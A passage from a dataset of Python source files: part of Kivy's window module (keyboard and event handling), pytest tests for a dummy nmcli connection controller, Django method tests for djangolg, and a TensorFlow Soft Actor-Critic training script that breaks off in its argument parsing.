shw:\n w.width = shw * width\n elif shh:\n w.height = shh * height\n for key, value in w.pos_hint.items():\n if key == 'x':\n w.x = value * width\n elif key == 'right':\n w.right = value * width\n elif key == 'y':\n w.y = value * height\n elif key == 'top':\n w.top = value * height\n elif key == 'center_x':\n w.center_x = value * width\n elif key == 'center_y':\n w.center_y = value * height\n\n def screenshot(self, name='screenshot{:04d}.png'):\n '''Save the actual displayed image in a file\n '''\n i = 0\n path = None\n if name != 'screenshot{:04d}.png':\n _ext = name.split('.')[-1]\n name = ''.join((name[:-(len(_ext) + 1)], '{:04d}.', _ext))\n while True:\n i += 1\n path = join(getcwd(), name.format(i))\n if not exists(path):\n break\n return path\n\n def on_rotate(self, rotation):\n '''Event called when the screen has been rotated.\n '''\n pass\n\n def on_close(self, *largs):\n '''Event called when the window is closed'''\n Modules.unregister_window(self)\n EventLoop.remove_event_listener(self)\n\n def on_request_close(self, *largs, **kwargs):\n '''Event called before we close the window. If a bound function returns\n `True`, the window will not be closed. If the the event is triggered\n because of the keyboard escape key, the keyword argument `source` is\n dispatched along with a value of `keyboard` to the bound functions.\n\n .. warning::\n When the bound function returns True the window will not be closed,\n so use with care because the user would not be able to close the\n program, even if the red X is clicked.\n '''\n pass\n\n def on_mouse_down(self, x, y, button, modifiers):\n '''Event called when the mouse is used (pressed/released)'''\n pass\n\n def on_mouse_move(self, x, y, modifiers):\n '''Event called when the mouse is moved with buttons pressed'''\n pass\n\n def on_mouse_up(self, x, y, button, modifiers):\n '''Event called when the mouse is moved with buttons pressed'''\n pass\n\n def on_joy_axis(self, stickid, axisid, value):\n '''Event called when a joystick has a stick or other axis moved\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_hat(self, stickid, hatid, value):\n '''Event called when a joystick has a hat/dpad moved\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_ball(self, stickid, ballid, value):\n '''Event called when a joystick has a ball moved\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_button_down(self, stickid, buttonid):\n '''Event called when a joystick has a button pressed\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_joy_button_up(self, stickid, buttonid):\n '''Event called when a joystick has a button released\n\n .. versionadded:: 1.9.0'''\n pass\n\n def on_keyboard(self, key, scancode=None, codepoint=None,\n modifier=None, **kwargs):\n '''Event called when keyboard is used.\n\n .. warning::\n Some providers may omit `scancode`, `codepoint` and/or `modifier`.\n '''\n if 'unicode' in kwargs:\n Logger.warning(\"The use of the unicode parameter is deprecated, \"\n \"and will be removed in future versions. Use \"\n \"codepoint instead, which has identical \"\n \"semantics.\")\n\n # Quit if user presses ESC or the typical OSX shortcuts CMD+q or CMD+w\n # TODO If just CMD+w is pressed, only the window should be closed.\n is_osx = platform == 'darwin'\n if WindowBase.on_keyboard.exit_on_escape:\n if key == 27 or all([is_osx, key in [113, 119], modifier == 1024]):\n if not self.dispatch('on_request_close', source='keyboard'):\n stopTouchApp()\n self.close()\n return True\n\n if Config:\n on_keyboard.exit_on_escape = Config.getboolean('kivy', 'exit_on_escape')\n\n def __exit(section, name, value):\n WindowBase.__dict__['on_keyboard'].exit_on_escape = \\\n Config.getboolean('kivy', 'exit_on_escape')\n\n Config.add_callback(__exit, 'kivy', 'exit_on_escape')\n\n def on_key_down(self, key, scancode=None, codepoint=None,\n modifier=None, **kwargs):\n '''Event called when a key is down (same arguments as on_keyboard)'''\n if 'unicode' in kwargs:\n Logger.warning(\"The use of the unicode parameter is deprecated, \"\n \"and will be removed in future versions. Use \"\n \"codepoint instead, which has identical \"\n \"semantics.\")\n\n def on_key_up(self, key, scancode=None, codepoint=None,\n modifier=None, **kwargs):\n '''Event called when a key is released (same arguments as on_keyboard)\n '''\n if 'unicode' in kwargs:\n Logger.warning(\"The use of the unicode parameter is deprecated, \"\n \"and will be removed in future versions. Use \"\n \"codepoint instead, which has identical \"\n \"semantics.\")\n\n def on_textinput(self, text):\n '''Event called whem text: i.e. alpha numeric non control keys or set\n of keys is entered. As it is not gaurenteed whether we get one\n character or multiple ones, this event supports handling multiple\n characters.\n\n .. versionadded:: 1.9.0\n '''\n pass\n\n def on_dropfile(self, filename):\n '''Event called when a file is dropped on the application.\n\n .. warning::\n\n This event currently works with sdl2 window provider, on pygame\n window provider and MacOSX with a patched version of pygame.\n This event is left in place for further evolution\n (ios, android etc.)\n\n .. versionadded:: 1.2.0\n '''\n pass\n\n @reify\n def dpi(self):\n '''Return the DPI of the screen. If the implementation doesn't support\n any DPI lookup, it will just return 96.\n\n .. warning::\n\n This value is not cross-platform. Use\n :attr:`kivy.base.EventLoop.dpi` instead.\n '''\n return 96.\n\n def configure_keyboards(self):\n # Configure how to provide keyboards (virtual or not)\n\n # register system keyboard to listening keys from window\n sk = self._system_keyboard\n self.bind(\n on_key_down=sk._on_window_key_down,\n on_key_up=sk._on_window_key_up,\n on_textinput=sk._on_window_textinput)\n\n # use the device's real keyboard\n self.use_syskeyboard = True\n\n # use the device's real keyboard\n self.allow_vkeyboard = False\n\n # one single vkeyboard shared between all widgets\n self.single_vkeyboard = True\n\n # the single vkeyboard is always sitting at the same position\n self.docked_vkeyboard = False\n\n # now read the configuration\n mode = Config.get('kivy', 'keyboard_mode')\n if mode not in ('', 'system', 'dock', 'multi', 'systemanddock',\n 'systemandmulti'):\n Logger.critical('Window: unknown keyboard mode %r' % mode)\n\n # adapt mode according to the configuration\n if mode == 'system':\n self.use_syskeyboard = True\n self.allow_vkeyboard = False\n self.single_vkeyboard = True\n self.docked_vkeyboard = False\n elif mode == 'dock':\n self.use_syskeyboard = False\n self.allow_vkeyboard = True\n self.single_vkeyboard = True\n self.docked_vkeyboard = True\n elif mode == 'multi':\n self.use_syskeyboard = False\n self.allow_vkeyboard = True\n self.single_vkeyboard = False\n self.docked_vkeyboard = False\n elif mode == 'systemanddock':\n self.use_syskeyboard = True\n self.allow_vkeyboard = True\n self.single_vkeyboard = True\n self.docked_vkeyboard = True\n elif mode == 'systemandmulti':\n self.use_syskeyboard = True\n self.allow_vkeyboard = True\n self.single_vkeyboard = False\n self.docked_vkeyboard = False\n\n Logger.info(\n 'Window: virtual keyboard %sallowed, %s, %s' % (\n '' if self.allow_vkeyboard else 'not ',\n 'single mode' if self.single_vkeyboard else 'multiuser mode',\n 'docked' if self.docked_vkeyboard else 'not docked'))\n\n def set_vkeyboard_class(self, cls):\n '''.. versionadded:: 1.0.8\n\n Set the VKeyboard class to use. If set to None, it will use the\n :class:`kivy.uix.vkeyboard.VKeyboard`.\n '''\n self._vkeyboard_cls = cls\n\n def release_all_keyboards(self):\n '''.. versionadded:: 1.0.8\n\n This will ensure that no virtual keyboard / system keyboard is\n requested. All instances will be closed.\n '''\n for key in list(self._keyboards.keys())[:]:\n keyboard = self._keyboards[key]\n if keyboard:\n keyboard.release()\n\n def request_keyboard(self, callback, target, input_type='text'):\n '''.. versionadded:: 1.0.4\n\n Internal widget method to request the keyboard. This method is rarely\n required by the end-user as it is handled automatically by the\n :class:`~kivy.uix.textinput.TextInput`. We expose it in case you want\n to handle the keyboard manually for unique input scenarios.\n\n A widget can request the keyboard, indicating a callback to call\n when the keyboard is released (or taken by another widget).\n\n :Parameters:\n `callback`: func\n Callback that will be called when the keyboard is\n closed. This can be because somebody else requested the\n keyboard or the user closed it.\n `target`: Widget\n Attach the keyboard to the specified `target`. This should be\n the widget that requested the keyboard. Ensure you have a\n different target attached to each keyboard if you're working in\n a multi user mode.\n\n .. versionadded:: 1.0.8\n\n `input_type`: string\n Choose the type of soft keyboard to request. Can be one of\n 'text', 'number', 'url', 'mail', 'datetime', 'tel', 'address'.\n\n .. note::\n\n `input_type` is currently only honored on mobile devices.\n\n .. versionadded:: 1.8.0\n\n :Return:\n An instance of :class:`Keyboard` containing the callback, target,\n and if the configuration allows it, a\n :class:`~kivy.uix.vkeyboard.VKeyboard` instance attached as a\n *.widget* property.\n\n .. note::\n\n The behavior of this function is heavily influenced by the current\n `keyboard_mode`. Please see the Config's\n :ref:`configuration tokens ` section for\n more information.\n\n '''\n\n # release any previous keyboard attached.\n self.release_keyboard(target)\n\n # if we can use virtual vkeyboard, activate it.\n if self.allow_vkeyboard:\n keyboard = None\n\n # late import\n global VKeyboard\n if VKeyboard is None and self._vkeyboard_cls is None:\n from kivy.uix.vkeyboard import VKeyboard\n self._vkeyboard_cls = VKeyboard\n\n # if the keyboard doesn't exist, create it.\n key = 'single' if self.single_vkeyboard else target\n if key not in self._keyboards:\n vkeyboard = self._vkeyboard_cls()\n keyboard = Keyboard(widget=vkeyboard, window=self)\n vkeyboard.bind(\n on_key_down=keyboard._on_vkeyboard_key_down,\n on_key_up=keyboard._on_vkeyboard_key_up,\n on_textinput=keyboard._on_vkeyboard_textinput)\n self._keyboards[key] = keyboard\n else:\n keyboard = self._keyboards[key]\n\n # configure vkeyboard\n keyboard.target = keyboard.widget.target = target\n keyboard.callback = keyboard.widget.callback = callback\n\n # add to the window\n self.add_widget(keyboard.widget)\n\n # only after add, do dock mode\n keyboard.widget.docked = self.docked_vkeyboard\n keyboard.widget.setup_mode()\n\n else:\n # system keyboard, just register the callback.\n keyboard = self._system_keyboard\n keyboard.callback = callback\n keyboard.target = target\n\n # use system (hardware) keyboard according to flag\n if self.allow_vkeyboard and self.use_syskeyboard:\n self.unbind(\n on_key_down=keyboard._on_window_key_down,\n on_key_up=keyboard._on_window_key_up,\n on_textinput=keyboard._on_window_textinput)\n self.bind(\n on_key_down=keyboard._on_window_key_down,\n on_key_up=keyboard._on_window_key_up,\n on_textinput=keyboard._on_window_textinput)\n\n return keyboard\n\n def release_keyboard(self, target=None):\n '''.. versionadded:: 1.0.4\n\n Internal method for the widget to release the real-keyboard. Check\n :meth:`request_keyboard` to understand how it works.\n '''\n if self.allow_vkeyboard:\n key = 'single' if self.single_vkeyboard else target\n if key not in self._keyboards:\n return\n keyboard = self._keyboards[key]\n callback = keyboard.callback\n if callback:\n keyboard.callback = None\n callback()\n keyboard.target = None\n self.remove_widget(keyboard.widget)\n if key != 'single' and key in self._keyboards:\n del self._keyboards[key]\n elif self._system_keyboard.callback:\n # this way will prevent possible recursion.\n callback = self._system_keyboard.callback\n self._system_keyboard.callback = None\n callback()\n return True\n\n#: Instance of a :class:`WindowBase` implementation\nwindow_impl = []\nif platform == 'linux':\n window_impl += [('egl_rpi', 'window_egl_rpi', 'WindowEglRpi')]\nif USE_SDL2:\n window_impl += [('sdl2', 'window_sdl2', 'WindowSDL')]\nelse:\n window_impl += [\n ('pygame', 'window_pygame', 'WindowPygame')]\nif platform == 'linux':\n window_impl += [('x11', 'window_x11', 'WindowX11')]\nWindow = core_select_lib('window', window_impl, True)\n"} {"ext": "py", "sha": "1a2ecbcb6ca1ff23a1edf9dcb9c5598434fd0b11", "content": "import pytest\n\nfrom nmcli.data import Connection\nfrom nmcli.dummy._connection import DummyConnectionControl\n\n\ndef test_call():\n result_call = [Connection('a', 'b', 'ethernet', 'eth0')]\n c = DummyConnectionControl(result_call)\n assert c() == result_call\n\n\ndef test_call_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c()\n\n\ndef test_add():\n c = DummyConnectionControl()\n conn_type = 'ethernet'\n options = {\n 'key': 'value'\n }\n ifname = 'eth0'\n name = 'MyHome'\n autoconnect = True\n c.add(conn_type, options, ifname, name, autoconnect)\n assert c.add_args[0] == (conn_type, options, ifname, name, autoconnect)\n\n c.add(conn_type, options, ifname, name, False)\n assert c.add_args[1] == (conn_type, options, ifname, name, False)\n\n c.add(conn_type, options, ifname, name)\n assert c.add_args[2] == (conn_type, options, ifname, name, None)\n\n\ndef test_add_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.add('ethernet')\n\n\ndef test_modify():\n c = DummyConnectionControl()\n options = {\n 'key': 'value'\n }\n name = 'MyHome'\n c.modify(name, options)\n assert c.modify_args[0] == (name, options)\n\n\ndef test_modify_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.modify('ethernet', {'key': 'value'})\n\n\ndef test_delete():\n c = DummyConnectionControl()\n name = 'MyHome'\n c.delete(name)\n assert c.delete_args[0] == name\n\n\ndef test_delete_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.delete('ethernet')\n\n\ndef test_up():\n c = DummyConnectionControl()\n name = 'MyHome'\n c.up(name)\n assert c.up_args[0] == name\n\n\ndef test_up_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.up('ethernet')\n\n\ndef test_down():\n c = DummyConnectionControl()\n name = 'MyHome'\n c.down(name)\n assert c.down_args[0] == name\n\n\ndef test_down_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.down('ethernet')\n\n\ndef test_show():\n result_show = {\n 'key': 'value'\n }\n c = DummyConnectionControl(result_show=result_show)\n name = 'MyHome'\n assert c.show(name) == result_show\n\n\ndef test_show_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.show('MyHome')\n\n\ndef test_show_when_no_arguments_are_passed():\n c = DummyConnectionControl()\n with pytest.raises(ValueError):\n c.show('MyHome')\n\n\ndef test_reload():\n c = DummyConnectionControl()\n c.reload()\n assert c.called_reload == 1\n\n\ndef test_reload_when_raise_error():\n c = DummyConnectionControl(raise_error=Exception)\n with pytest.raises(Exception):\n c.reload()\n"} {"ext": "py", "sha": "1a2ecc01c02d5a7aaafdb9765bdc7895de56fd7b", "content": "# Copyright 2017 Workonline Communications (Pty) Ltd. All rights reserved.\n#\n# The contents of this file are licensed under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with the\n# License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations under\n# the License.\n\"\"\"Method test classes for djangolg.\"\"\"\n\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\n\nfrom djangolg import dialects, methods\nfrom djangolg.methods.base import BaseMethod\n\n\nclass MethodTestCase(TestCase):\n \"\"\"Test djangolg methods.\"\"\"\n\n def test_available_methods(self):\n \"\"\"Test available_methods helper.\"\"\"\n methods_map = methods.available_methods(\"map\")\n methods_list = methods.available_methods(\"list\")\n assert isinstance(methods_map, dict)\n assert isinstance(methods_list, list)\n try:\n methods.available_methods(\"wrong\")\n except Exception as e:\n assert isinstance(e, ValueError)\n assert \"{}\".format(e) == \"invalid output type: wrong\"\n\n def test_get_method(self):\n \"\"\"Test get_method helper.\"\"\"\n for method_name in methods.available_methods(\"list\"):\n method = methods.get_method(name=method_name)\n assert isinstance(method, BaseMethod)\n try:\n methods.get_method()\n except Exception as e:\n assert isinstance(e, methods.MethodNotFound)\n try:\n methods.get_method(name=dict())\n except Exception as e:\n assert isinstance(e, methods.LookingGlassMethodError)\n\n def test_method_init_failure(self):\n \"\"\"Test method initiation failure.\"\"\"\n try:\n BaseMethod(dialect=\"string\")\n except Exception as e:\n assert isinstance(e, TypeError)\n\n def test_method_dialect_functions(self):\n \"\"\"Test method dialect getter and setter and other methods.\"\"\"\n for method_name in methods.available_methods(output=\"list\"):\n method = methods.get_method(name=method_name)\n assert method.dialect is None\n try:\n method.dialect = \"wrong_type\"\n except Exception as e:\n assert isinstance(e, TypeError)\n for dialect_name in dialects.available_dialects(output=\"list\"):\n dialect = dialects.get_dialect(dialect_name)\n method.dialect = dialect\n assert method.dialect is dialect\n if method.options:\n for index, option in method.option_choices():\n assert method.get_command(target=method.test_target,\n option_index=index)\n else:\n assert method.get_command(target=method.test_target)\n"} {"ext": "py", "sha": "1a2ecc4174f6c45060cfce4f1cd969cb4664de63", "content": "import numpy as np\nimport tensorflow as tf\nfrom numbers import Number\nimport gym\nimport time\nfrom spinup.algos.tf1.sac1 import core\nfrom spinup.algos.tf1.sac1.core import get_vars\nfrom spinup.utils.logx import EpochLogger\nfrom gym.spaces import Box, Discrete\nfrom spinup.utils.frame_stack import FrameStack\nimport os\n\nclass ReplayBuffer:\n \"\"\"\n A simple FIFO experience replay buffer for SAC agents.\n \"\"\"\n\n def __init__(self, obs_dim, act_dim, size):\n self.obs1_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.obs2_buf = np.zeros([size, obs_dim], dtype=np.float32)\n self.acts_buf = np.zeros([size, act_dim], dtype=np.float32)\n self.rews_buf = np.zeros(size, dtype=np.float32)\n self.done_buf = np.zeros(size, dtype=np.float32)\n self.ptr, self.size, self.max_size = 0, 0, size\n\n def store(self, obs, act, rew, next_obs, done):\n self.obs1_buf[self.ptr] = obs\n self.obs2_buf[self.ptr] = next_obs\n self.acts_buf[self.ptr] = act\n self.rews_buf[self.ptr] = rew\n self.done_buf[self.ptr] = done\n self.ptr = (self.ptr+1) % self.max_size\n self.size = min(self.size+1, self.max_size)\n\n def sample_batch(self, batch_size=32):\n idxs = np.random.randint(0, self.size, size=batch_size)\n return dict(obs1=self.obs1_buf[idxs],\n obs2=self.obs2_buf[idxs],\n acts=self.acts_buf[idxs],\n rews=self.rews_buf[idxs],\n done=self.done_buf[idxs])\n\n\"\"\"\n\nSoft Actor-Critic\n\n(With slight variations that bring it closer to TD3)\n\n\"\"\"\ndef sac1(args, env_fn, actor_critic=core.mlp_actor_critic, ac_kwargs=dict(), seed=0,\n steps_per_epoch=1000, epochs=100, replay_size=int(2e6), gamma=0.99, reward_scale=1.0,\n polyak=0.995, lr=5e-4, alpha=0.2, batch_size=200, start_steps=10000,\n max_ep_len_train=1000, max_ep_len_test=1000, logger_kwargs=dict(), save_freq=1):\n \"\"\"\n\n Args:\n env_fn : A function which creates a copy of the environment.\n The environment must satisfy the OpenAI Gym API.\n\n actor_critic: A function which takes in placeholder symbols \n for state, ``x_ph``, and action, ``a_ph``, and returns the main \n outputs from the agent's Tensorflow computation graph:\n\n =========== ================ ======================================\n Symbol Shape Description\n =========== ================ ======================================\n ``mu`` (batch, act_dim) | Computes mean actions from policy\n | given states.\n ``pi`` (batch, act_dim) | Samples actions from policy given \n | states.\n ``logp_pi`` (batch,) | Gives log probability, according to\n | the policy, of the action sampled by\n | ``pi``. Critical: must be differentiable\n | with respect to policy parameters all\n | the way through action sampling.\n ``q1`` (batch,) | Gives one estimate of Q* for \n | states in ``x_ph`` and actions in\n | ``a_ph``.\n ``q2`` (batch,) | Gives another estimate of Q* for \n | states in ``x_ph`` and actions in\n | ``a_ph``.\n ``q1_pi`` (batch,) | Gives the composition of ``q1`` and \n | ``pi`` for states in ``x_ph``: \n | q1(x, pi(x)).\n ``q2_pi`` (batch,) | Gives the composition of ``q2`` and \n | ``pi`` for states in ``x_ph``: \n | q2(x, pi(x)).\n =========== ================ ======================================\n\n ac_kwargs (dict): Any kwargs appropriate for the actor_critic \n function you provided to SAC.\n\n seed (int): Seed for random number generators.\n\n steps_per_epoch (int): Number of steps of interaction (state-action pairs) \n for the agent and the environment in each epoch.\n\n epochs (int): Number of epochs to run and train agent.\n\n replay_size (int): Maximum length of replay buffer.\n\n gamma (float): Discount factor. (Always between 0 and 1.)\n\n polyak (float): Interpolation factor in polyak averaging for target \n networks. Target networks are updated towards main networks \n according to:\n\n .. math:: \\\\theta_{\\\\text{targ}} \\\\leftarrow \n \\\\rho \\\\theta_{\\\\text{targ}} + (1-\\\\rho) \\\\theta\n\n where :math:`\\\\rho` is polyak. (Always between 0 and 1, usually \n close to 1.)\n\n lr (float): Learning rate (used for policy/value/alpha learning).\n\n alpha (float/'auto'): Entropy regularization coefficient. (Equivalent to\n inverse of reward scale in the original SAC paper.) / 'auto': alpha is automated.\n\n batch_size (int): Minibatch size for SGD.\n\n start_steps (int): Number of steps for uniform-random action selection,\n before running real policy. Helps exploration.\n\n max_ep_len (int): Maximum length of trajectory / episode / rollout.\n\n logger_kwargs (dict): Keyword args for EpochLogger.\n\n save_freq (int): How often (in terms of gap between epochs) to save\n the current policy and value function.\n\n \"\"\"\n if not args.is_test:\n logger = EpochLogger(**logger_kwargs)\n logger.save_config(locals())\n\n tf.set_random_seed(seed)\n np.random.seed(seed)\n\n env, test_env = env_fn(3), env_fn(1)\n obs_dim = env.observation_space.shape[0]\n act_dim = env.action_space.shape[0]\n\n # Action limit for clamping: critically, assumes all dimensions share the same bound!\n act_limit = env.action_space.high[0]\n\n # Share information about action space with policy architecture\n ac_kwargs['action_space'] = env.action_space\n\n # Inputs to computation graph\n x_ph, a_ph, x2_ph, r_ph, d_ph = core.placeholders(obs_dim, act_dim, obs_dim, None, None)\n\n # Main outputs from computation graph\n with tf.variable_scope('main'):\n mu, pi, logp_pi, logp_pi2, q1, q2, q1_pi, q2_pi = actor_critic(x_ph, x2_ph, a_ph, **ac_kwargs)\n \n # Target value network\n with tf.variable_scope('target'):\n _, _, logp_pi_, _, _, _,q1_pi_, q2_pi_= actor_critic(x2_ph, x2_ph, a_ph, **ac_kwargs)\n\n # Experience buffer\n replay_buffer = ReplayBuffer(obs_dim=obs_dim, act_dim=act_dim, size=replay_size)\n\n # Count variables\n var_counts = tuple(core.count_vars(scope) for scope in \n ['main/pi', 'main/q1', 'main/q2', 'main'])\n print(('\\nNumber of parameters: \\t pi: %d, \\t' + \\\n 'q1: %d, \\t q2: %d, \\t total: %d\\n')%var_counts)\n\n######\n if alpha == 'auto':\n target_entropy = (-np.prod(env.action_space.shape))\n\n log_alpha = tf.get_variable( 'log_alpha', dtype=tf.float32, initializer=0.0)\n alpha = tf.exp(log_alpha)\n\n alpha_loss = tf.reduce_mean(-log_alpha * tf.stop_gradient(logp_pi + target_entropy))\n\n alpha_optimizer = tf.train.AdamOptimizer(learning_rate=lr*0.1, name='alpha_optimizer')\n train_alpha_op = alpha_optimizer.minimize(loss=alpha_loss, var_list=[log_alpha])\n######\n\n # Min Double-Q:\n min_q_pi = tf.minimum(q1_pi_, q2_pi_)\n\n # Targets for Q and V regression\n v_backup = tf.stop_gradient(min_q_pi - alpha * logp_pi2)\n q_backup = r_ph + gamma*(1-d_ph)*v_backup\n\n\n # Soft actor-critic losses\n pi_loss = tf.reduce_mean(alpha * logp_pi - q1_pi)\n q1_loss = 0.5 * tf.reduce_mean((q_backup - q1)**2)\n q2_loss = 0.5 * tf.reduce_mean((q_backup - q2)**2)\n value_loss = q1_loss + q2_loss\n\n # Policy train op \n # (has to be separate from value train op, because q1_pi appears in pi_loss)\n pi_optimizer = tf.train.AdamOptimizer(learning_rate=lr)\n train_pi_op = pi_optimizer.minimize(pi_loss, var_list=get_vars('main/pi'))\n\n # Value train op\n # (control dep of train_pi_op because sess.run otherwise evaluates in nondeterministic order)\n value_optimizer = tf.train.AdamOptimizer(learning_rate=lr)\n value_params = get_vars('main/q')\n with tf.control_dependencies([train_pi_op]):\n train_value_op = value_optimizer.minimize(value_loss, var_list=value_params)\n\n # Polyak averaging for target variables\n # (control flow because sess.run otherwise evaluates in nondeterministic order)\n with tf.control_dependencies([train_value_op]):\n target_update = tf.group([tf.assign(v_targ, polyak*v_targ + (1-polyak)*v_main)\n for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n # All ops to call during one training step\n if isinstance(alpha, Number):\n step_ops = [pi_loss, q1_loss, q2_loss, q1, q2, logp_pi, tf.identity(alpha),\n train_pi_op, train_value_op, target_update]\n else:\n step_ops = [pi_loss, q1_loss, q2_loss, q1, q2, logp_pi, alpha,\n train_pi_op, train_value_op, target_update, train_alpha_op]\n\n\n # Initializing targets to match main variables\n target_init = tf.group([tf.assign(v_targ, v_main)\n for v_main, v_targ in zip(get_vars('main'), get_vars('target'))])\n\n sess = tf.Session()\n sess.run(tf.global_variables_initializer())\n sess.run(target_init)\n\n\n ############################## save and restore ############################\n\n saver = tf.train.Saver()\n\n checkpoint_path = logger_kwargs['output_dir'] + '/checkpoints'\n if not os.path.exists(checkpoint_path):\n os.makedirs(checkpoint_path)\n\n if args.is_test or args.is_restore_train:\n ckpt = tf.train.get_checkpoint_state(checkpoint_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"Model restored.\")\n\n\n\n def get_action(o, deterministic=False):\n act_op = mu if deterministic else pi\n return sess.run(act_op, feed_dict={x_ph: o.reshape(1,-1)})[0]\n\n\n ############################## test ############################\n\n if args.is_test:\n test_env = gym.make(args.env)\n ave_ep_ret = 0\n for j in range(10000):\n o, r, d, ep_ret, ep_len = test_env.reset(), 0, False, 0, 0\n while not d: # (d or (ep_len == 2000)):\n o, r, d, _ = test_env.step(get_action(o, True))\n ep_ret += r\n ep_len += 1\n if args.test_render:\n test_env.render()\n ave_ep_ret = (j*ave_ep_ret + ep_ret)/(j+1)\n print('ep_len', ep_len, 'ep_ret:', ep_ret, 'ave_ep_ret:',ave_ep_ret,'({}/10000)'.format(j+1) )\n return\n\n\n ############################## train ############################\n\n def test_agent(n=25):\n global sess, mu, pi, q1, q2, q1_pi, q2_pi\n for j in range(n):\n o, r, d, ep_ret, ep_len = test_env.reset(), 0, False, 0, 0\n while not(d or (ep_len == max_ep_len_test)):\n # Take deterministic actions at test time \n o, r, d, _ = test_env.step(get_action(o, True))\n ep_ret += r\n ep_len += 1\n # test_env.render()\n logger.store(TestEpRet=ep_ret, TestEpLen=ep_len)\n\n start_time = time.time()\n o, r, d, ep_ret, ep_len = env.reset(), 0, False, 0, 0\n total_steps = steps_per_epoch * epochs\n\n ep_index = 0\n test_ep_ret_best = test_ep_ret = -10000.0\n\n # Main loop: collect experience in env and update/log each epoch\n for t in range(total_steps):\n\n \"\"\"\n Until start_steps have elapsed, randomly sample actions\n from a uniform distribution for better exploration. Afterwards, \n use the learned policy. \n \"\"\"\n if t > start_steps:\n a = get_action(o)\n else:\n a = env.action_space.sample()\n\n # Step the env\n o2, r, d, _ = env.step(a)\n ep_ret += r\n ep_len += 1\n\n # Ignore the \"done\" signal if it comes from hitting the time\n # horizon (that is, when it's an artificial terminal signal\n # that isn't based on the agent's state)\n # d = False if ep_len==max_ep_len_train else d\n\n # Store experience to replay buffer\n replay_buffer.store(o, a, r, o2, d)\n\n # Super critical, easy to overlook step: make sure to update \n # most recent observation!\n o = o2\n\n # End of episode. Training (ep_len times).\n if d or (ep_len == max_ep_len_train):\n ep_index += 1\n print('episode: {}, ep_len: {}, reward: {}'.format(ep_index, ep_len, ep_ret/reward_scale))\n \"\"\"\n Perform all SAC updates at the end of the trajectory.\n This is a slight difference from the SAC specified in the\n original paper.\n \"\"\"\n for j in range(int(1.5*ep_len)):\n batch = replay_buffer.sample_batch(batch_size)\n feed_dict = {x_ph: batch['obs1'],\n x2_ph: batch['obs2'],\n a_ph: batch['acts'],\n r_ph: batch['rews'],\n d_ph: batch['done'],\n }\n # step_ops = [pi_loss, q1_loss, q2_loss, q1, q2, logp_pi, alpha, train_pi_op, train_value_op, target_update]\n outs = sess.run(step_ops, feed_dict)\n logger.store(LossPi=outs[0], LossQ1=outs[1], LossQ2=outs[2],\n Q1Vals=outs[3], Q2Vals=outs[4],\n LogPi=outs[5], Alpha=outs[6])\n\n logger.store(EpRet=ep_ret/reward_scale, EpLen=ep_len)\n o, r, d, ep_ret, ep_len = env.reset(), 0, False, 0, 0\n\n\n # End of epoch wrap-up\n if t > 0 and t % steps_per_epoch == 0:\n epoch = t // steps_per_epoch\n\n test_agent(10)\n # test_ep_ret = logger.get_stats('TestEpRet')[0]\n # print('TestEpRet', test_ep_ret, 'Best:', test_ep_ret_best)\n if logger.get_stats('TestEpRet')[0] >= 180:\n print('Recalculating TestEpRet...')\n test_agent(100)\n test_ep_ret = logger.get_stats('TestEpRet')[0]\n # logger.epoch_dict['TestEpRet'] = []\n\n print('TestEpRet', test_ep_ret, 'Best:', test_ep_ret_best)\n\n # logger.store(): store the data; logger.log_tabular(): log the data; logger.dump_tabular(): write the data\n # Log info about epoch\n logger.log_tabular('Epoch', epoch)\n logger.log_tabular('Num_Ep', ep_index)\n logger.log_tabular('EpRet', with_min_and_max=True)\n logger.log_tabular('TestEpRet', with_min_and_max=False)\n logger.log_tabular('EpLen', average_only=True)\n logger.log_tabular('TestEpLen', average_only=True)\n logger.log_tabular('TotalEnvInteracts', t)\n logger.log_tabular('Alpha',average_only=True)\n logger.log_tabular('Q1Vals', with_min_and_max=True)\n logger.log_tabular('Q2Vals', with_min_and_max=True)\n # logger.log_tabular('VVals', with_min_and_max=True)\n logger.log_tabular('LogPi', with_min_and_max=True)\n logger.log_tabular('LossPi', average_only=True)\n logger.log_tabular('LossQ1', average_only=True)\n logger.log_tabular('LossQ2', average_only=True)\n # logger.log_tabular('LossV', average_only=True)\n logger.log_tabular('Time', time.time()-start_time)\n logger.dump_tabular()\n\n\n # Save model\n if ((epoch % save_freq == 0) or (epoch == epochs - 1)) and test_ep_ret > test_ep_ret_best:\n save_path = saver.save(sess, checkpoint_path+'/model.ckpt', t)\n print(\"Model saved in path: %s\" % save_path)\n test_ep_ret_best = test_ep_ret\n\n if test_ep_ret >= 200:\n print(\"Model saved in path: %s\" % save_path)\n\n print('\\nEnvironment solved in {:d} episodes!\\tAverage Score: {:.2f}'.format(ep_index, test_ep_ret))\n exit()\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--env', type=str, default='LunarLanderContinuous-v2') # 'Pendulum-v0'\n\n parser.add_argument('--is_restore_train', type=bool, default=False)\n\n parser.add_argument('--is_test', type=bool, default=False)\n parser.add_argument('--test_render', type=bool, default=False)\n\n parser.add_argument('--max_ep_len_test', type=int, default=2000) # 